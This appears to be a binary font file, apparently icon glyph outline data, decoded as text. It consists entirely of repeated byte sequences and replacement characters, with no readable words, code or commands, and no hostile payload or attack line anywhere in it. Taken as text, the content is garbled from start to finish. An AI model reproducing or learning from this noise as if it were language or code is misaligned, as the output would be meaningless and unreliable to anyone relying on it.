V5j��p��0���2WA&��`;#.#"#4&#"#4&#".32>54&#"#37'a�  2p3N.+s[1XA& �h��h���P��0��5V3RuNHY&AW2P h��h���;i%'7'>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32`h��h/R<#   1p
2N/(mS +Jc8%LHA'R:#b//!	()!/
!/ "h��h��'AT0�P��P��P��5V
3RuOCX�8cJ+*D1Hv^G"/,!/		/!�.!� ``;>54&#"#4&#"#4&#"#4&#".1'7�0Q<#   2p
3N/(oQh��B��'AU0P0��P��0��5V3RuNDW!h�����9h4&#"#4&#".32>=4&#"#4&#"7'7#".'.7614632>32>32>32` 1p
2N/*tZ2WA& h��h +Jc8%LHA'R:"b//!	()!/
!/�P��P��5V2StOHY&AW2�P��h��h"�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``8%4&#"#4&#".32>54&#"#4&#"7'7` 2p
3N/*s[1XA& h��h�r��0��5V3RuNHY&AW2P0��h��h���3b%12>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32p2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/ &AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``24&#"#4&#".32>54&#"#4&#"#` 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2P0�����`�9q��>321>54&#".#".#"54671>32>329>54&#".#".#"1.54>3:>321623212>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32f
.BT<	11	<T)
--�#gI55Ig#+5!8L+99+L8!5+�2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/8B.;.<TT<.[)�G)IggI)G']7+L8!!8L+7]��&AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!���`�0^�>54&#"1.#".#"154632146321>32>54&#*#1.#"*#"1.5467>32'4&#"#4&#".32>54&#"#4&#"#B.

7"#7

/A/!

/!!/
!/#U;?%&?<T#+5bFG))FFb6*� 2p
3N/*s[1XA&  b(.B%%B.(N!/!//!/!N*>&<T##T<%?%T3Gf##fG3T���0��5V3RuNHY&AW2P0�����@�#.8BFJT^hlp5'7'!467%5'7'!467"34&#112#546"354&#3535"34&#12#546"354&#3535@h��h6J��J6`h��h6J��J6��.B�B.!/�/!`P���.B�B.!/�/!`P����h��h�Q8�P�8Q`�h��h�R7��8QA/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@�#-15?CG5'7'!4675'7'!467"354&#3535"354&#3535�h��h6J��J6��h��h6J��J6!/�/!P���!/�/!P���~�h��h�R8��8R`�h��h�R7�O�7R@/!pp!/��  @  �/!pp!/��  @  ���@@!=GQ[eim%>54.#"5.54>325>54.#"54>32'12!46"34&#12#546"354&#3535�:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�<T��T<.B�B.!/�/!`P����.�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+�T<��<T B.��.B /!pp!/ PP�  @  ���@@	=Y12!46"354&#35357>54.#"5.54>325>54.#"54>32�<T��T<!/�/!P����:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�T<��<T@/!pp!/��  @  .�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+���@�#-7AEIS]gko%#4632#7'7%#4632#7'7"34&#12#546"354&#3535"34&#12#546"354&#3535@�T<<T�h��h`�T<<T�h��h��.B�B.!/�/!`P���.B�B.!/�/!`P�����<TT<�P�h��h�<TT<���h��h�A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@`#-15?CG%#4632#7'7%#4632#7'7"354&#3535"354&#3535@�T<<T�h��h`�T<<T�h��h��!/�/!P���!/�/!P�����<TT<�P�h��h�<TT<��h��h�/!pp!/��  @  �/!pp!/��  @  @����&0:>BLV`dh!46323'7'7%12!46"34&#112#546"354&#3535"34&#12#546"354&#3535���T<<T�h��h�N<T��T<.B�B.!/�/!`P���.B�B.!/�/!`P�����`<TT<Ph��h�T<�P�<T A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  @����%)-7;?!46323'7'7%12!46"354&#3535"354&#3535���T<<T�h��h�N<T��T<!/�/!P���!/�/!P�����`<TT<Ph��h�T<�P�<T@/!pp!/��  @  �/!pp!/��  @  >����%/37AKU_cg>32!#'7%"34&#112#546"354&#353512!46"34&#12#546"354&#3535AQ8<T���h��hR.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����6JT<�P�h��h`A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  @����#-7;?>32!#'737"354&#353512!46"354&#3535BR8;U���h��h".�/!P���;U��T<".�/!P����6JT<�P�h��h@/!pp!/��  @  T<��<T@/!pp!/��  @  ��!+5?IMQ>54.#"5.54>3212!46"34&#12#546"354&#3535�,4+Jc88cJ+4,"&AW22WA&"�<T��T<.B�B.!/�/!`P���!%l>8cJ++Jc8>l%, T/2WA&&AW2/T 3T<��<T B.��.B /!pp!/ PP�  @  ��	=12!46"354&#35357>54.#"5.54>32�<T��T<!/�/!P���`,4+Jc88cJ+4,"&AW22WA&"�T<��<T@/!pp!/��  @  A%l>8cJ++Jc8>l%, T/2WA&&AW2/T 	`����%/9=ANp35#5#"&546712!46"34&#12#546"354&#35352654&#"3>54.#"5.54>32 @@)7B..B7)�p<T��T<.B�B.!/�/!`P���P<TT<<TT<�,4+Jc88cJ+4,"&AW22WA&" _?*.BB.*?�T<��<T B.��.B /!pp!/ PP�  @  �T<<TT<<T��%l>8cJ++Jc8>l%, T/2WA&&AW2/T `����"&*7;]#"&5467312!46"354&#35352654&#"3735>54.#"5.54>32 )7B..B7) �P<T��T<!/�/!P���P<TT<<TT<@��,4+Jc88cJ+4,"&AW22WA&"?*.BB.*?�T<��<T@/!pp!/��  @  �T<<TT<<T�  �%l>8cJ++Jc8>l%, T/2WA&&AW2/T ����`	'+/37;@D12!46"34&#12#546"354&#3535357#3!35#7'<T��T<.B�B.!/�/!`P���` �qqj���ࠠjqq�T<��<T B.��.B /!pp!/ PP�  @  ���jqr�    rq	����`	#',012!46"354&#3535357#3!35#7'<T��T<!/�/!P���` �qqj���ࠠjqq�T<��<T@/!pp!/��  @  ���jqr�    rq~����#-7;?3'7'7#!#'73>32'"34&#12#546"354&#3535��h��h���h��h�Q87R�.B�B.!/�/!`P���h��h�h��h6JJ6`B.��.B /!pp!/ PP�  @  ~����#'+3'7'7#!#'73>32'"354&#3535��h��h���h��h�Q87R�!/�/!P���h��h�h��h6JJ6@/!pp!/��  @  ~����#-7AEI3'7'7#!#'73>75'7'9'"34&#12#546"354&#3535��h��h���h��h�H2h��h2H�.B�B.!/�/!`P���h��h�h��h2H�h��h�H2`B.��.B /!pp!/ PP�  @  ~����",04>715'7'3'7'7#!#'737"354&#3535�H2h��h2H�h��h���h��hÏ!/�/!P���2H�h��h�H2h��h�h��h@/!pp!/��  @  ��@	(,0:DNX\`��12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
��@	%/37_�12!46"354&#353512!46"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
@���	(,0:DNX\`�12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%	@���	%/37e12!46"354&#353512!46"354&#35357>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%~����$.26>32!#'7%"34&#12#546"354&#3535�Q8<T���h��hR.B�B.!/�/!`P���6JT<��h��h`B.��.B /!pp!/ PP�  @  ~���� $9>32!#'7%"354&#3535�Q8<T���h��hR!/�/!P���6JT<��h��h@/!pp!/��  @  `����%/37!46323'7'7#'"34&#12#546"354&#3535���T<7R�h��h.B�B.!/�/!`P����<TJ6h��h�B.��.B /!pp!/ PP�  @  `����!%3'7'7#!46329'"354&#3535�h��h��T<7R�!/�/!P���h��h�<TJ6@/!pp!/��  @  �����%/375'7'!467"34&#12#546"354&#3535h��h6J��J6.B�B.!/�/!`P����h��h�R7��8QB.��.B /!pp!/ PP�  @  �����#5'7'!467"354&#3535h��h6J��J6!/�/!P����h��h�R7��8Q?/!pp!/��  @  �����%/37%7'75#4632"34&#12#546"354&#3535 h��h�T<<T�.B�B.!/�/!`P�����h��h�<TT<���B.��.B /!pp!/ PP�  @  �����#%#4632#7'7"354&#3535�T<<T�h��h!/�/!P����<TT<���h��h"/!pp!/��  @  ����	+<M#5353#73+"&=3;26='#353735#%!2#!"&=463"3!26=4&#!   `  � & % 
 
�0       � (88(��(88(%& %&���ࠠ��%&��

�``�@@��`8(�(88(�(8 &�%&�%����	+<#5353#73+"&=3;26=73#5#'#53%"3!26=4&#!   `  � & % 
 
�0       �`(88( (88(���ࠠ��%&��

�``�@@��`8(�(88(�(8����$5FO~#"&=46;5#";5#3%3532654&+5!2#!"&=463"3!26=4&#!32+%";2+"&51#1;2654&+"&546;234&+@@

``&%``@�� @&%` (88(��(88(%& %&�� @

@�&% 

 
 % &% 

 
 % �@
`
 %`&� @�`%%`8(�(88(�(8 &�%&�%`

`%%


&%%


%����$5>l#53#"&=46;#";5%532+#"3!26=4&#!32654&#%32#4&+";2+"&5131;2654&+"&546@@``%&``

@��`%&@ (88( (88(�� @

` % 
 

 %& % 
 

 %&� �&`% 
`
@@@%%`@8(�(88(�(8�@

 %


%%&


%%����!/:GP\e!2#!"&=463"3!26=4&#!##546;2#'"354&+532+#5732654&#532+#732654&# (88(��(88(%& %&��` & % @
`
 �`%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 @%%`� @

 @%%`�@

����)6?KT!2#!"&=463354&+"357"354&+3532654&+732654&#3532654&+32654&# (88(��(88(� % &  
`
 � @&%` @

` @&%` @

�8(�(88(�(8�`�%%�``
  
 �`%%@ @

 �`%% @

����!-6@Y!2#!"&=463"3!26=4&#!532+#732654&##5353#7#"&=46;5#";5#3 (88(��(88(%& %&��`%&@  @

�  `  �@

``&%``@�8(�(88(�(8 &�%&�%�@%%`�@

 �ࠠ�`@
`
 %`&� ����%/H!2#!"&=4633532654&+32654&#35#'#3%#"&=46;5#";5#3 (88(��(88( @&%` @

�`  `   @

``&%``@�8(�(88(�(8��`%% @

 �ࠠ�`@
`
 %`&� ����!+7@KU!2#!"&=463"3!26=4&#!535#3535%532+#732654&#732+5326=4&# (88(��(88(%& %&����� `�`%&@  @

``%&` @

�8(�(88(�(8 &�%&�%�@ �`  @%%`�@

 &`%� �
`
����&/:D!2#!"&=463535#3535%3532654&+32654&#7326=4&+326=4&# (88(��(88(��� `� @&%` @

``&%` @

�8(�(88(�(8�@ �`  �`%% @

 �%`& �
`
����!.[hq!2#!"&=463"3!26=4&#!'#353735#46;2+"&53;2654&+532654&+"#532+#5732654&# (88(��(88(%& %&��P0       & %

& % 
 

  

 
�`%&@  @

�8(�(88(�(8 &�%&�%�`�@@��@%%		%%


 


@%%`� @

����KXa!2#!"&=463'#353735#346;2+32+"&5#;2654&'>54&+"#3532654&+732654&# (88(��(88(P0        
 

  

 
 % &

% &� @&%` @

�8(�(88(�(8�`�@@��@


 


%%		%%�`%%@ @

����!$/<IR!2#!"&=463"3!26=4&#!#73535#5#%'#353735#532+#5732654&# (88(��(88(%& %&���::    `��0       @`%&@  @

�8(�(88(�(8 &�%&�%�Pp@@ �� @`�@@��@@%%`� @

����+8A!2#!"&=46353535#5#%'#353735#3532654&+732654&# (88(��(88(�::    `��0       @ @&%` @

�8(�(88(�(8�PP @@ �� @`�@@��@�`%%@ @

����!2CPW!2#!"&=463"3!26=4&#!32+"&=463";26=4&+'#353735#73#'3 (88(��(88(%& %&�� %& %&

 

 �0       P0 @ @ �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
@`�@@�ਨ������!2?F!2#!"&=463";26=4&+";26=4&+'#353735#'#37# (88(��(88(&% &% 

 

 �0       P0 @ @ �8(�(88(�(8`%`&%`& 
`

`
@`�@@�ਨ������!6CLe!2#!"&=463"3!26=4&#!;26=#+"&=#7532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��% & 
 
 �`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%� &%��

 @@%%`� @

`@
`
 %`&� ����%2;T!2#!"&=463;26=#+"&=#73532654&+732654&##"&=46;5#";5#3 (88(��(88(% & 
 
 � @&%` @

�@

``&%``@�8(�(88(�(8� &%��

 @�`%%@ @

`@
`
 %`&� ����!-8E!2#!"&=463"3!26=4&#!3#53#3#5373#%#5'53753 (88(��(88(%& %&�����`��  V*pp*j @ 00 �8(�(88(�(8 &�%&�%�@ � @ 
V�VVpp````  HH  ����'4"3!26=4&#!3#53#3#5373#%#5'53753(88( (88(�����`��  V*pp*j @ 00 �8(�(88(�(8�@ � @ 
V�VVpp````  HH  @���%-9F!2#!"&=46"3!26=4&##53%3535#53#5##53!'#353735#��(88(� (88(&&�&&� �� @�@  `  �0       �8(�(88(�(8 &�%&�%� ���  @`�``�``�@@��@���)6!2#!"&=46#5#3%3535##5#35335#'#353735#��(88(� (88� ��  @�@`  `  P0       �8(�(88(�(8����  @`�``�``�@@������!Bq�!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�%&`%%

`

�%%


&%%


%%%


&%%


%����1`�!2#!"&=463#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8�

`

%%`&%�%%


&%%


%%%


&%%


%@���&;ITbm!2#!"&=46"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+��(88(� (88(&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
 �8(�(88(�(8 &�%&�%��� &%��

 `�%%��
  
``�%%��
  
@���+9DR]"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+�(88(�(88(��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �8(�(88(�(8����� 

��%& `�%%��
  
``�%%��
  
����!-6epz!2#!"&=463"3!26=4&#!532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&# (88(��(88(%& %&��`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

�8(�(88(�(8 &�%&�%�@%%`�@

 %%


&%%


%&`%� �
`
����%T_i!2#!"&=4633532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&# (88(��(88( @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

�8(�(88(�(8��`%% @

 %%


&%%


%�%`& �
`
����!-;F!2#!"&=463"3!26=4&#!#35#535###546;2#'"354&+ (88(��(88(%& %&��` `  ``` & % @
`
 �8(�(88(�(8 &�%&�%`�  �  ``�%%��
  
����*5"3!26=4&#!#53#3#53'##546;2#'"354&+(88( (88(��` `  ` �` & % @
`
 �8(�(88(�(8�  �  @`�%%��
  
����!1:CP\e!2#!"&=463"3!26=4&#!532+732654&#32654&#7'#353735#532+#732654&# (88(��(88(%& %&��`%

&` @

@@

�0       @`%&@  @

�8(�(88(�(8 &�%&�%�x%		%�@

`@

 `�@@��@@%%`�@

���� )2?KT!2#!"&=46332654&'>54&+32654&#32654&#7'#353735#3532654&+32654&# (88(��(88(`&

%` @

@@

�0       @ @&%` @

�8(�(88(�(8�h%		% @

`@

 `�@@��@�`%% @

����!/:D]!2#!"&=463"3!26=4&#!#'#537353%32+5326=4&##"&=46;5#";5#3 (88(��(88(%& %&��P00      ��`%&` @

�@

``&%``@�8(�(88(�(8 &�%&�%��``�@@���&`%� �
`
`@
`
 %`&� ����)3L!2#!"&=46335#'#5#37%326=4&+326=4&##"&=46;5#";5#3 (88(��(88(P      00��`&%` @

�@

``&%``@�8(�(88(�(8���@@��``��%`& �
`
`@
`
 %`&� ����!-:Cr!2#!"&=463"3!26=4&#!3#53#37532+#5732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&�� ����`@`%&@  @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@ � @ @@%%`� @

 %%


&%%


%����)2a!2#!"&=46335#535#35#73532654&+732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88( ``����� @&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8� @ � ��`%%@ @

 %%


&%%


%����'3=G!2#!"&=46"3!26=4&#3535#3#35#535#535#35353535#3535��(88(�`(88(&%�&%�� @�� `  `��� ``�� `�8(�(88(�(8 &�%&�%`��  �  �  @@ �` @ �` ����#-7!2#!"&=463535#3#35#535#535#35353535#3535��(88(�`(88h @�� `  `��� ``�� `�8(�(88(�(8���  �  �  @@ �` @ �` ����!1BJy!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��   %%


&%%


%���� 19h!2#!"&=463";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`

`
��   %%


&%%


%����!-6BNW!2#!"&=463"3!26=4&#!532+#732654&#53#5##537532+#732654&# (88(��(88(%& %&��`%&@  @

�  `  �`%&@  @

�8(�(88(�(8 &�%&�%�@%%`�@

@`�``�` @%%`�@

����%1=F!2#!"&=4633532654&+32654&##5#35335#3532654&+32654&# (88(��(88( @&%` @

�`  `  @ @&%` @

�8(�(88(�(8��`%% @

@`�``�@�`%% @

����!-6C!2#!"&=463"3!26=4&#!532+#732654&##5'53753 (88(��(88(%& %&��``%&@  @

� @ 00 �8(�(88(�(8 &�%&�%�@%%`�@

````  HH  ����%2!2#!"&=4633532654&+32654&#75#'5#3 (88(��(88(` @&%` @

�@ 00 @ �8(�(88(�(8��`%% @

``  HH  ``����!B!2#!"&=463"3!26=4&#!+"&=46;2#4&+";2653 (88(��(88(%& %&��`& %& & 
 

 
 �8(�(88(�(8 &�%&�%�%&`%%

`

����1"3!26=4&#!+"&=46;2#4&+";2653(88( (88(��`& %& & 
 

 
 �8(�(88(�(8�%&`%%

`

����*;Lz�7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!";2+"&51#1;2654&+"&546;234&##536% &% 

 
,"�� (88(��(88(%& %&��@&% 

 
 % &% 

 
 %�� D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%@%%


&%%


%� �����*;io+"&=46;2''#"&=46;2'"3!26=4&#!32#4&+";2+"&5131;2654&+"&546#536 %& %

 
,"��(88( (88(��@ % 
 

 %& % 
 

 %&�� D&`%&`	
`

`
," 8(�(88(�(8`%


%%&


%%� �����!/8HQZ!2#!"&=463"3!26=4&#!##532##'32654&#532+732654&#32654&# (88(��(88(%& %&�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8 &�%&�%�`�%%`�@

Xx%		%�@

`@

����'7@I"3!26=4&#!##532##'32654&#532+732654&#32654&#(88( (88(�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8�`�%%`�@

Xx%		%�@

`@

����!BOXdm!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537532+#5732654&#532+#732654&# (88(��(88(%& %&��& %& & 
 

 
  `%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�%&`%%

`

`@%%`� @

 @%%`�@

����1>GS\!2#!"&=463#+"&=46;234&+";26573532654&+732654&#3532654&+32654&# (88(��(88(� 
 

 
 & &% &  @&%` @

` @&%` @

�8(�(88(�(8�

`

%%`&%`�`%%@ @

 �`%% @

����!)BP[!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#33##546;2#'"354&+ (88(��(88(%& %&��@ @�@@

``&%``@�` & % @
`
 �8(�(88(�(8 &�%&�%`��  `@
`
 %`&� `�%%��
  
����1?J!2#!"&=4633535##"&=46;5#";5#33354&+"357"354&+ (88(��(88(@ @�@@

``&%``@� % &  
`
 �8(�(88(�(8���  `@
`
 %`&� `�%%�``
  
����!-8BL!2#!"&=463"3!26=4&#!'373#'#'32+5326=4&#535#3535 (88(��(88(%& %&��@ 00 @@ 00 �`%&` @

@�� `�8(�(88(�(8 &�%&�%�pTTppTT�&`%� �
`
@@ �` ����'1;!2#!"&=463373'7#'##326=4&+326=4&#535#3535 (88(��(88(@ 00 @@ 00 �`&%` @

@�� `�8(�(88(�(8�pTTppTT�%`& �
`
@@ �` ����!,6GXy!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&++"&=46;2#4&+";2653 (88(��(88(%& %&��`%&` @

� %& %&

 

  & %& & 
 

 
 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

����%6Gh!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+#+"&=46;234&+";265 (88(��(88(`&%` @

�&% &% 

 

   
 

 
 & &% &�8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%����!1BMW_!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#33535# (88(��(88(%& %&��@ %& %&

 

 �`%&` @

� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
��  ���� 1<FN!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#33535# (88(��(88(@&% &% 

 

 �`&%` @

� @��8(�(88(�(8`%`&%`& 
`

`
 �%`& �
`
��  ����!-3b!2#!"&=463"3!26=4&#!'373#'#%#537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%����"P"3!26=4&#!'373#'#%#53732#4&+";2+"&5131;2654&+"&546(88( (88(��@@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�8(�(88(�(8�pTTppTT  �%


%%&


%%@���*4DUv�!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT@���$4Efr!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#��(88(� (88(`&%` @

�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT����!.7CLT!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#!3535# (88(��(88(%& %&��`%&@  @

��`%&@  @

` @��8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

��  ����&2;C!2#!"&=4633532654&+732654&#3532654&+32654&#!3535# (88(��(88(� @&%` @

�� @&%` @

` @��8(�(88(�(8��`%%@ @

 �`%% @

��  ����!/:iu~!2#!"&=463"3!26=4&#!##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&# (88(��(88(%& %&��` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 %%


&%%


%@@%%`�@

����)Xdm!2#!"&=463354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&# (88(��(88(� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�8(�(88(�(8�`�%%�``
  
 %%


&%%


%@�`%% @

����!-N}!2#!"&=463"3!26=4&#!#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%`�  �  �%&`%%

`

�%%


&%%


%����=l!2#!"&=463#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+ (88(��(88(@ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �8(�(88(�(8��  �  �

`

%%`&%�%%


&%%


%����!/:EOW!2#!"&=463"3!26=4&#!##546;2#'"354&+%32+5326=4&#!3535# (88(��(88(%& %&��@` & % @
`
 �`%&` @

` @��8(�(88(�(8 &�%&�%�`�%%��
  
 &`%� �
`
��  ����)4>F!2#!"&=463354&+"357"354&+%326=4&+326=4&#!3535# (88(��(88(@ % &  
`
 �`&%` @

` @��8(�(88(�(8�`�%%�``
  
 �%`& �
`
��  ����!-:@!2#!"&=463"3!26=4&#!'373#'#%'#353735##53 (88(��(88(%& %&��@@ 00 @@ 00 0       � �8(�(88(�(8 &�%&�%�pTTppTT�`�@@�� �����)/"3!26=4&#!'373#'#%73#5#'#53#53(88( (88(��@@ 00 @@ 00 0       @� �8(�(88(�(8�pTTppTT�`�@@�� �����!.;A!2#!"&=463"3!26=4&#!#5'53753'#353735##53 (88(��(88(%& %&��` @ 00 p0       � �8(�(88(�(8 &�%&�%�```  HH  @`�@@�� �����*0"3!26=4&#!#5'5375373#5#'#53#53(88( (88(��` @ 00 p0       @� �8(�(88(�(8�```  HH  @`�@@�� �����!-!2#!"&=463"3!26=4&#!53#5##53 (88(��(88(%& %&��@  `  �8(�(88(�(8 &�%&�%�`�``�`����"3!26=4&#!53#5##53(88( (88(��@  `  �8(�(88(�(8�`�``�`����!-9E!2#!"&=463"3!26=4&#!3#53#37'373#'#73#53#3 (88(��(88(%& %&�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8 &�%&�%�@ � @ pTTppTT`@ � @ ����(4"3!26=4&#!3#53#37'373#'#73#53#3(88( (88(�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8�@ � @ pTTppTT`@ � @ ��`�!/:AM!2#!"&=463"3!26=4&#!##546;2#'"354&+73#'3#35#535#� (88(��(88(%& %&��` & % @
`
 �0 @ @ � `  `�8(�(88(�(8 &�%&�%�`�%%��
  
���� �  �  ��`�)0<"3!26=4&#!##546;2#'"354&+73#'3#53#3#53�(88( (88(��` & % @
`
 �0 @ @ � `  ` �8(�(88(�(8�`�%%��
  
����   �  ����!,6BK[l!2#!"&=463"3!26=4&#!32+5326=4&#532+#732654&#%32+"&=46";26=4&+ (88(��(88(%& %&��`%&` @

``%&@  @

�` %& %&

 

 �8(�(88(�(8 &�%&�%@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
����%1:J[!2#!"&=463326=4&+326=4&#3532654&+32654&#%";26=4&#";26=4&+ (88(��(88(�`&%` @

` @&%` @

�`&% &% 

 

 �8(�(88(�(8`�%`& �
`
 �`%% @

 %`&%`& 
`

`
@���*4DU]i!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&+33535#'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

 � @�@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT@���$4EMY!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+33535#373'7#'#��(88(� (88(`&%` @

�&% &% 

 

 � @�@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT@���+1`l!2#!"&=46"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#��(88(� (88(&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00 �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%ppTTppTT@���!O["3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#�(88(�(88(�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �8(�(88(�(8�pTTppTT  �%


%%&


%%ppTTppTT����!1BMW�!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 �`%&` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%���� 1<Fu!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 �`&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`
